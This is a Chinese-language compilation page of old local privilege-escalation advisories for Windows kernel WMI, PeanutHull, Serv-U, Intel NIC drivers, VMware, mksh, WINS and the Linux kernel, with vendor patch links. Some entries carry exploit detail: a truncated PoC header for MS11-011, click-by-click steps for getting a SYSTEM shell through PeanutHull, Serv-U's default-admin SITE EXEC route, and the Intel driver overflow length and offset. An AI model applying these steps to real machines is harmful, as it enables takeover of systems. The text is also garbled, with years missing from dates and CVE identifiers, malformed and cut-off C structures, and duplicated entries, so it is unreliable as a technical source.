当前位置：首页 > 范文大全 > 实用文>Microsoft Windows Kernel整数截断本地权限提升漏洞及修复

Microsoft Windows Kernel整数截断本地权限提升漏洞及修复

2023-06-12 08:23:00 收藏本文下载本文

“天岳98714”通过精心收集，向本站投稿了10篇Microsoft Windows Kernel整数截断本地权限提升漏洞及修复，下面是小编整理后的Microsoft Windows Kernel整数截断本地权限提升漏洞及修复，欢迎您能喜欢，也请多多分享。

篇1：Microsoft Windows Kernel整数截断本地权限提升漏洞及修复

影响版本:

Microsoft Windows XP Tablet PC Edition SP3

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows XP Tablet PC Edition SP1

Microsoft Windows XP Tablet PC Edition

Microsoft Windows XP Service Pack 3 0

Microsoft Windows XP Professional SP3

Microsoft Windows XP Professional SP2

Microsoft Windows XP Professional SP1

Microsoft Windows XP Professional

Microsoft Windows XP Media Center Edition SP3

Microsoft Windows XP Media Center Edition SP2

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows XP Media Center Edition

Microsoft Windows XP Home SP3

Microsoft Windows XP Home SP2

Microsoft Windows XP Home SP1

Microsoft Windows XP Home

Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows XP 64-bit Edition

漏洞描述:

Windows是微软发布的非常流行的操作系统，

Windows Kernel在实现上存在本地权限提升漏洞，攻击者可利用此漏洞以内核级别权限执行任意代码，从而完全控制受影响计算机。

此漏洞源于Kernel对跟踪事件的支持。由于畸形转换，Kernel为用户空间中的数据分配使用截断的长度。在填充此缓冲区时，Kernel将使用造成缓冲区溢出的另一个长度。这将造成内存破坏并导致执行任意代码。

<*参考

www.zerodayinitiative.com/advisories/ZDI-11-064/

std_logic 提供了如下测试方法：

# Exploit Title: MS11-011(CVE--0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC

# Date: 2011-03-01

# Author: Nikita Tarakanov (CISS Research Team)

# Software Link:

# Version: prior to MS11-011

# Tested on: Win XP SP3

# CVE : CVE-2011-0045

# Status : Patched

# Binary Analysis: html“>cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html

#include

#define WmiTraceMessageCode 40

#define WmiCreateUMLogger 84

#define WmiStartLoggerCode 32

#define IOCTL_WMI_TRACE_MESSAGE

CTL_CODE(FILE_DEVICE_UNKNOWN, WmiTraceMessageCode,

METHOD_NEITHER, FILE_WRITE_ACCESS)

#define CTL_CODE( DeviceType, Function, Method, Access ) (

((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method)

)

#define IOCTL_WMI_TRACE_MESSAGE

CTL_CODE(FILE_DEVICE_UNKNOWN, WmiTraceMessageCode,

METHOD_NEITHER, FILE_WRITE_ACCESS)

#define IOCTL_WMI_CREATE_UM_LOGGER CTL_CODE(FILE_DEVICE_UNKNOWN,

WmiCreateUMLogger, METHOD_BUFFERED, FILE_READ_ACCESS)

#define IOCTL_WMI_START_LOGGER

CTL_CODE(FILE_DEVICE_UNKNOWN, WmiStartLoggerCode,

METHOD_BUFFERED, FILE_ANY_ACCESS)

typedef struct _UNICODE_STRING {

USHORT Length;

USHORT MaximumLength;

PWSTR Buffer;

} UNICODE_STRING;

typedef UNICODE_STRING *PUNICODE_STRING;

typedef struct _STRING64 {

USHORT Length;

USHORT MaximumLength;

ULONGLONG Buffer;

} STRING64;

typedef STRING64 *PSTRING64;

typedef STRING64 UNICODE_STRING64;

typedef UNICODE_STRING64 *PUNICODE_STRING64;

// WNODE definition

typedef struct _WNODE_HEADER

{

ULONG BufferSize; // Size of entire buffer inclusive of this

ULONG

ULONG ProviderId; // Provider Id of driver returning this buffer

union

{

ULONG64 HistoricalContext; // Logger use

struct

{

ULONG Version; // Reserved

ULONG Linkage; // Linkage field reserved for WMI

};

union

{

ULONG CountLost; // Reserved

HANDLE KernelHandle; // Kernel handle for data block

LARGE_INTEGER TimeStamp; // Timestamp as returned in units of 100ns

// since 1/1/1601

};

GUID Guid; // Guid for data block returned with results

ULONG ClientContext;

ULONG Flags; // Flags, see below

} WNODE_HEADER, *PWNODE_HEADER;

// Logger configuration and running statistics. This structure is used

// by WMI.DLL to convert to UNICODE_STRING

// begin_wmikm

typedef struct _WMI_LOGGER_INFORMATION {

WNODE_HEADER Wnode; // Had to do this since wmium.h comes later

// data provider by caller

ULONG BufferSize; // buffer size for logging (in

kbytes)

ULONG MinimumBuffers; // minimum to preallocate

ULONG MaximumBuffers; // maximum buffers allowed

ULONG MaximumFileSize; // maximum logfile size (in MBytes)

ULONG LogFileMode; // sequential, circular

ULONG FlushTimer; // buffer flush timer, in seconds

ULONG EnableFlags; // trace enable flags

LONG AgeLimit; // aging decay time, in minutes

ULONG Wow; // TRUE if the logger started

under WOW64

union {

HANDLE LogFileHandle; // handle to logfile

篇2：花生壳本地权限提升漏洞

花生壳本地权限提升漏洞by Sowhat最后更新：.09.24英文: secway.org/advisory/AD20050720EN.txt中文: secway.org/advisory/AD20050720CN.txtCVE:CAN-2005-2382BID:14330受影响的产品:PeanutHull <= 3.0.1.0 综述:网域科技号称全球最大的DDNS（动态域名）提供商，花生壳是它们提供的客户端详细信息，可以查看www.oray.net具体细节:该漏洞主要是由于花生壳客户端系统图标没有正确的丢弃SYSTEM权限。本地非特权用户可以通过访问系统图标来以SYSTEM权限执行任意命令。Exploit:1. 双击任务栏花生壳图标，打开花生壳窗口2. 单击“帮助”，打开“论坛”3. 在跳出的IE地址栏中输入C:\4. 切换到%WINDIR%\System32\5. 单击打开cmd.exe6. 此时打开的cmd.exe以SYSTEM权限运行成功利用此漏洞可以获取SYSTEM权限厂商回复:2005.07.13 通过EMAIL通知厂商，

2005.07.14 厂商回复称将在3.0正式版中修复这个问题 2005.07.20 花生壳3.0正式版发布2005.07.20 此公告发布更新：Secunia在验证此漏洞时的发现，最新的3.0.1.0版依然存在此缺陷。本地用户可以通过发送SW_SHOW消息来调出花生壳窗口，进而提升权限。2005.07.21 测试代码公布Exploit:secway.org/exploit/PeanutHull_Local.rar解决方案：暂无请使用花生壳的用户限制普通用户的访问并时刻关注网域科技的补丁

篇3：ServU本地权限提升漏洞

受影响系统：

RhinoSoftServ-U5.1.0.0

RhinoSoftServ-U5.0.0.9

RhinoSoftServ-U5.0.0.4

RhinoSoftServ-U5.0

RhinoSoftServ-U4.1.0.3

RhinoSoftServ-U4.1.0.11

RhinoSoftServ-U4.0.0.4

RhinoSoftServ-U4.0.0.0

RhinoSoftServ-U3.0.0.20

描述：

--------------------------------------------------------------------------------

Serv-U是一个Windows平台下使用非常广泛的FTP服务器软件，

ServU本地权限提升漏洞

，

Serv-U存在设计问题，本地攻击者可以利用这个漏洞以SYSTEM权限在系统上执行任意命令。

所有Serv-U存在默认本地管理员登录密码，这帐户只能在本地接口中连接，因此本地攻击者可以连接Serv-U并建立拥有执行权限的FTP用户，在这个用户建立后，连接FTP服务器并执行”SITEEXEC“命令，程序就会以SYSTEM权限执行。

链接：marc.theaimsgroup.com/?l=full-disclosure

篇4：花生壳本地权限提升漏洞的分析研究

受影响的产品:

PeanutHull <= 3.0.1.0

综述:

网域科技号称全球最大的DDNS（动态域名）提供商，

花生壳是它们提供的客户端

详细信息，可以查看www.oray.net

具体细节:

该漏洞主要是由于花生壳客户端系统图标没有正确的丢弃SYSTEM权限。

本地非特权用户可以通过访问系统图标来以SYSTEM权限执行任意命令。

Exploit:

1. 双击任务栏花生壳图标，打开花生壳窗口

2. 单击“帮助”，打开“论坛”

3. 在跳出的IE地址栏中输入C:\

4. 切换到%WINDIR%\System32\

5. 单击打开cmd.exe

6. 此时打开的cmd.exe以SYSTEM权限运行

成功利用此漏洞可以获取SYSTEM权限

厂商回复:

.07.13 通过EMAIL通知厂商，

2005.07.14 厂商回复称将在3.0正式版中修复这个问题

2005.07.20 花生壳3.0正式版发布

2005.07.20 此公告发布

更新：

Secunia在验证此漏洞时的发现，最新的3.0.1.0版依然存在此缺陷。

本地用户可以通过发送SW_SHOW消息来调出花生壳窗口，进而提升权限。

2005.07.21 测试代码公布

Exploit:

secway.org/exploit/PeanutHull_Local.rar

或者见附件

解决方案：

暂无

请时刻关注网域科技的补丁

PeanutHull_Local.rar

篇5：Intel网卡驱动本地权限提升漏洞

受影响系统：Intel PRO 10/100 for Windows <= 8.0.27.0

Intel PRO 10/100 for UnixWare/SCO6 <= 4.0.3

Intel PRO 10/100 for Linux <= 3.5.14

Intel PRO/1000 for Windows <= 8.7.1.0

Intel PRO/1000 for UnixWare/SCO6 <= 9.0.15

Intel PRO/1000 for Linux <= 7.2.7

Intel PRO/1000 PCIe <= 9.1.30.0

Intel PRO/10GbE <= 1.0.109不受影响系统：Intel PRO 10/100 for Windows 8.0.43.0

Intel PRO 10/100 for UnixWare/SCO6 4.0.4

Intel PRO 10/100 for Linux 3.5.17

Intel PRO/1000 for Windows 8.7.9.0

Intel PRO/1000 for UnixWare/SCO6 9.2.6

Intel PRO/1000 for Linux 7.3.15

Intel PRO/1000 PCIe 9.6.31.0

Intel PRO/10GbE 1.0.119描述：

BUGTRAQ ID: 21456

Intel Pro 100/1000是英特尔推出的系列网卡设备，

所有的Intel网卡驱动（NDIS miniport驱动）中都存在一个栈溢出漏洞，本地攻击者可能利用此漏洞提升自己在系统中的权限。

尽管NDIS miniport驱动占用的是低层，非特权用户态代码仍可以通过需要由NDIS实现的网卡统计请求与该驱动通讯。如果攻击者能够向\Device\{adapterguid}发送IOCTL_NDIS_QUERY_SELECTED_STATS (0x17000E)请求的话，就会导致NDIS.SYS调用 miniport驱动在调用NdisMRegisterMiniport时所注册的QueryInformationHandler例程，

这个IOCTL所提供的输入缓冲区是一个有关统计的32位OID列表，每个都独立的传送给了QueryInformationHandler，其中包含有检索统计并将其返回给输出缓冲区所需的代码。

在Intel miniport驱动中，某些OID处理器会处理输出缓冲区的内容。在Windows 下，指向用户提供缓冲区的指针直接传送给了miniport驱动，这意味着数据是用户可控的。在Windows XP及之后版本下，指针传送给了内核内存中包含有未定义数据的临时缓冲区，因此必须在攻击前控制pool内存才能控制上述数据。

OID 0xFF0203FC的处理器使用以下strcpy操作将输出缓冲区的字符串拷贝到栈变量：

strcpy(&(var_1D4.sz_62), (char*)InformationBuffer + 4)

因此，攻击者可以通过提供0x17A个字符的字符串导致处理器完全覆盖函数的返回地址，将执行流重新定向到任意用户态或内核态地址。攻击字符串必须位于输出缓冲区的+0x0C偏移处，因为NDIS本身会使用前8个字节。

<*来源：Derek Soeder （dsoeder@eeye.com）

链接：www.intel.com/support/network/sb/CS-023726.htm

research.eeye.com/html/advisories/published/AD1207.html

建议：

厂商补丁：

Intel

-----

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

support.intel.com/support/network/sb/cs-006103.htm

support.intel.com/support/network/sb/cs-006120.htm

support.intel.com/support/network/adapter/pro100/sb/cs-008402.htm

篇6：Linux平台上的VMware vmrun 本地权限提升漏洞及修复

影响版本:

VMWare Workstation 7.x

VMWare Workstation 6.x

漏洞描述:

VMware VIX API可协作您编写虚拟机自动化操作的软件和脚本，运行程序或管理客户机操作系统中的文件，VMware Workstation是一款功能强大的桌面虚拟计算机软件，提供用户可在单一的桌面上同时运行不同的操作系统，和进行开发、测试、部署新的应用程序的最佳解决方案。

Linux平台上的VMware ”vmrun“在实现上存在本地权限提升漏洞，攻击者可利用此漏洞造成权限提升，

此漏洞源于vmrun程序错误地从某些目录中加载库，造成以当前运行vmrun的用户权限执行任意代码，使程序加载恶意共享库。

<*参考

Tim Brown （securityfocus@machine.org.uk）

marc.info/?l=full-disclosure&m=130146421004752&w=2

厂商补丁：

VMWare

------

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

www.vmware.com

篇7：MirOS BSD Korn Shell本地权限提升漏洞

受影响系统：MirOS Project MirBSD Korn Shell < R33d不受影响系统：MirOS Project MirBSD Korn Shell R33d描述：--------------------------------------------------------------------------------BUGTRAQ ID: 28768MirOS BSD是运行在32位

受影响系统：

MirOS Project MirBSD Korn Shell < R33d

不受影响系统：

MirOS Project MirBSD Korn Shell R33d

描述：

--------------------------------------------------------------------------------

BUGTRAQ ID: 28768

MirOS BSD是运行在32位i386和sparc平台上的BSD家族操作系统，

MirOS BSD Korn Shell本地权限提升漏洞

，

MirBSD的Korn Shell（mksh）在通过-T命令行开关附加到TTY时存在错误，本地攻击者可以利用之前写入到所附加虚拟控制台的字符以运行mksh用户的权限执行任意命令。

<*来源：MirOS Project

链接：secunia.com/advisories/29803/

www.mirbsd.org/mksh.htm#clog

建议：

--------------------------------------------------------------------------------

厂商补丁：

MirOS Project

-------------

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

www.mirbsd.org

篇8：微软Windows WINS服务本地权限提升漏洞

来源：IT Lab

Microsoft Windows是微软发布的非常流行的操作系统，Windows中的WINS服务没有充分验证特制WINS网络报文内的数据结构，可能允许本地攻击者使用提升的权限运行代码。

发布日期：-06-10

更新日期：2008-06-12

受影响系统：

Microsoft Windows Server SP2

Microsoft Windows Server 2003 SP1

Microsoft Windows SP4

描述：

----------------------------------------------------------------------------

BUGTRAQ ID: 29588

CVE(CAN) ID: CVE-2008-1451

Microsoft Windows是微软发布的非常流行的操作系统。

Windows中的WINS服务没有充分验证特制WINS网络报文内的数据结构，可能允许本地攻击者使用提升的权限运行代码，

成功利用此漏洞的攻击者可以完全控制受影响的系统。随后，攻击者可以安装程序；查看、更改或删除数据；或者创建新帐户。

<*来源：Microsoft

链接：secunia.com/advisories/30584/

www.microsoft.com/technetsecurity.chinaitlab.com/bulletin/MS08-034.mspx?pf=true

www.us-cert.gov/cas/techalerts/TA08-162B.html

建议：

----------------------------------------------------------------------------

厂商补丁：

Microsoft

---------

Microsoft已经为此发布了一个安全公告（MS08-034）以及相应补丁:

MS08-034：Vulnerability in WINS Could Allow Elevation of Privilege (948745)

链接：www.microsoft.com/technetsecurity.chinaitlab.com/bulletin/MS08-034.mspx?pf=true

篇9：Linux Kernel PROC文件系统本地权限提升漏洞

受影响系统：Linux kernel < 2.6.17.5不受影响系统：Linux kernel 2.6.17.5描述：

BUGTRAQ ID: 18992

CVE(CAN) ID: CVE--3626

Linux Kernel是开发源码操作系统Linux所使用的内核，

Linux Kernel的proc文件系统中存在竞争条件错误，本地攻击者可能利用此漏洞获取root用户权限。

这是一个0day攻击，目前正在被积极的利用。

<*来源：h00lyshit （h00lyshit@yahoo.ie）

链接：marc.theaimsgroup.com/?l=full-disclosure&m=115290935923500&w=2

www.debian.org/security//dsa-1111

建议：

厂商补丁：

Debian

------

Debian已经为此发布了一个安全公告（DSA-1111-1）以及相应补丁:

DSA-1111-1：New Linux kernel 2.6.8 packages fix privilege escalation

链接：www.debian.org/security/2005/dsa-1111

补丁下载：

Source archives:

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-16sarge4.dsc

Size/MD5 checksum: 812 ff4792fd28cadb6774ae4310ce38e301

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-16sarge4.tar.gz

Size/MD5 checksum: 38839 e4d527c319269df165cc23fd6fb54a68

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-16sarge4.dsc

Size/MD5 checksum: 1103 7dc33f6d9079af9d79b05d6ece3dfdc5

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-16sarge4.tar.gz

Size/MD5 checksum: 75714 264ee72864b022045cc4b0820fe062db

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-14sarge4.dsc

Size/MD5 checksum: 1191 0fb79cfacfc5581263710440357ed5ce

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-14sarge4.tar.gz

Size/MD5 checksum: 64204 02b5b536eebb207995ef3a754de1c87e

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-16sarge4.dsc

Size/MD5 checksum: 1047 62f42ea9f118d911a8f215af2f3e586d

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-16sarge4.tar.gz

Size/MD5 checksum: 90861 885cb72bd69153dcd6512db147caa173

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-15sarge4.dsc

Size/MD5 checksum: 1036 00d330ff015d713c4652ea05c5555f91

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-15sarge4.tar.gz

Size/MD5 checksum: 24447 393b640388a78dd98c727a08f972214c

security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-16sarge4.dsc

Size/MD5 checksum: 1002 bca4e80e8a10ba3c0884e3fab032772b

security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-16sarge4.diff.gz

Size/MD5 checksum: 1044761 b6675f6ac09f5d31f780650798c5609c

security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8.orig.tar.gz

Size/MD5 checksum: 43929719 0393c05ffa4770c3c5178b74dc7a4282

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-12sarge4.dsc

Size/MD5 checksum: 1071 4bb132bef3f8f2a220ad9e74ab76500e

security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-12sarge4.tar.gz

Size/MD5 checksum: 27031 59fb7f129abc85794829e1e777b540a0

Architecture independent components:

security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-doc-2.6.8_2.6.8-16sarge4_all.deb

Size/MD5 checksum: 6183402 a4efe296e5fd14d33c6b1ae1f40265c3

security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-patch-debian-2.6.8_2.6.8-16sarge4_all.deb

Size/MD5 checksum: 1081512 562d408fa5cd936f557eceb74621bff2

security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-16sarge4_all.deb

Size/MD5 checksum: 34943124 7b65a57ca6a2376d8042143244b8f5ab

security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-tree-2.6.8_2.6.8-16sarge4_all.deb

Size/MD5 checksum: 35134 80f1a94b1542bf3f89bd77d0a69c67c4

Alpha architecture:

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-3_2.6.8-16sarge4_alpha.deb

Size/MD5 checksum: 2759858 310b0ddfee56412d0fdf827fbb53ad04

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-3-generic_2.6.8-16sarge4_alpha.deb

Size/MD5 checksum: 232256 264fb1d8c9107950918e02b3c8d1b2c5

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-3-smp_2.6.8-16sarge4_alpha.deb

Size/MD5 checksum: 227366 3c43da6bd0a369e67be02af8e3498d60

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-3-generic_2.6.8-16sarge4_alpha.deb

Size/MD5 checksum: 20220764 714e37e85c5387ef44ef8ca96608934a

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-3-smp_2.6.8-16sarge4_alpha.deb

Size/MD5 checksum: 3926 24005f33bb551a3dec6cdbbdae45efdf

Intel IA-32 architecture:

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 2722664 c435fecd5d9cbda8f337c3cd86fc0dca

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-generic_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 226110 94d5814aed329864cad5d1584a5d44e2

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-k8_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 225244 d8128cc1a753402d41ce2b7ddcee875a

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-k8-smp_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 221102 76161094b4af81690b489010912ad94d

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-em64t-p4_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 223202 89d8a6a610eccf151bdbd38f7467731c

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-em64t-p4-smp_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 219462 9eb4bace25ae262ac51c45617661f3be

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-generic_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 12561704 c3ffffed8671d53630c176618d12fbc9

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-k8_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 13257210 a4d1fac79a380edbe4284659428f7623

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-k8-smp_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 13219086 a578d5400499044678959c16e8839153

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-em64t-p4_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 13217374 1b4965fe7b97de4e24075ea3541a21fd

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-em64t-p4-smp_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 13190288 417cafc0fc4dd74032fc9f184ecb8659

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 2779472 3c3d561576b2bbcae74806518f2d526f

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-386_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 258572 b6ef0ead4cbbd2f4700613fae13ecad6

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-686_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 256372 3bcb4f79630757e495377f140c055c5a

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-686-smp_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 253422 fd1d4a2ff14ea852098b41435a8dd8f2

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-k7_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 256716 9369c6b0c81fe61fe0640fbbb5d295a3

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-3-k7-smp_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 253512 027cb58c47a72a2fb0303d98988e5ec0

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-386_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 14063498 847b68ff55485cd1cfdef9b951a27639

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-686_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 15536232 d3974ee45e891069362eed6af842bcfd

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-686-smp_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 15346658 a52d56df265fe38bb822e3a09ce627e4

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-k7_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 15261024 8e67b0d239fc9ca47db18ed49b42a083

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-k7-smp_2.6.8-16sarge4_i386.deb

Size/MD5 checksum: 15124402 16d13d0ef23a03258fdca8dffeae8cc6

Intel IA-64 architecture:

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-itanium_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 6678 75fdf84848419b73b504cf440bb89030

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-itanium-smp_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 6750 0583066225780439bc152d5067de73fd

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-mckinley_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 6706 b9daa129196ea166ccfdd1bfc5528aae

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-mckinley-smp_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 6776 816a81ea2af11666807310e001413ca2

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 3098892 53c416f0b21d13d97b9cafdaf53335fe

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3-itanium_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 200088 a13df28d82aea874f7f2f7624964a180

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3-itanium-smp_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 199418 0c89142d3f9bd9dc9bc0945c2c5a5252

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3-mckinley_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 64 1627d34ecce889ab7feeb079e5e786a5

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3-mckinley-smp_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 199352 1f8fbb0f499928da9afad963240a2a5a

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-itanium_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 6676 863e6dbb301810732ca5b967d1348b1d

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-itanium-smp_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 6750 a0be1dbee3890815491446c70292af6b

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-mckinley_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 6702 55fe56f2f3de36221c8c00826e6eca6c

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-mckinley-smp_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 6774 b00877ca52331c964323b12056cd1f70

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-3-itanium_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 21476370 c9a52f35220d0e3bc61b1f507b7dc716

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-3-itanium-smp_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 22136612 9d6f06b3203fec64ef280bb2147b60ae

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-3-mckinley_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 21409268 2a5e1b20baa1a668304e4c6c0ee96f77

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-3-mckinley-smp_2.6.8-14sarge4_ia64.deb

Size/MD5 checksum: 22154522 dd8e2bab100e8447434428d8c3d0cd33

Sun Sparc architecture:

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-build-2.6.8-3_2.6.8-15sarge4_sparc.deb

Size/MD5 checksum: 5270 d9d8a08c7d95af660ddb27b2bdf3edb2

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-3_2.6.8-15sarge4_sparc.deb

Size/MD5 checksum: 2890614 25a5f93a494d583f533d8a8b6afc5811

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-3-sparc32_2.6.8-15sarge4_sparc.deb

Size/MD5 checksum: 110050 ef8055368116c6de685e2e5fb3eb7bc9

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-3-sparc64_2.6.8-15sarge4_sparc.deb

Size/MD5 checksum: 144772 3c49e410afa9020cfb0ed6e7daa1197a

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-3-sparc64-smp_2.6.8-15sarge4_sparc.deb

Size/MD5 checksum: 145386 b5f7c0add8b7f5709235a9a3108b0752

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-3-sparc32_2.6.8-15sarge4_sparc.deb

Size/MD5 checksum: 4551130 87c9d50a7693e0f049ee47e32e1b07ff

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-3-sparc64_2.6.8-15sarge4_sparc.deb

Size/MD5 checksum: 7430922 eceb79d6f7dd483ce5188e7934d1c506

security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-3-sparc64-smp_2.6.8-15sarge4_sparc.deb

Size/MD5 checksum: 7628714 3a3dddddba19f112f7b3b93ba5d44642

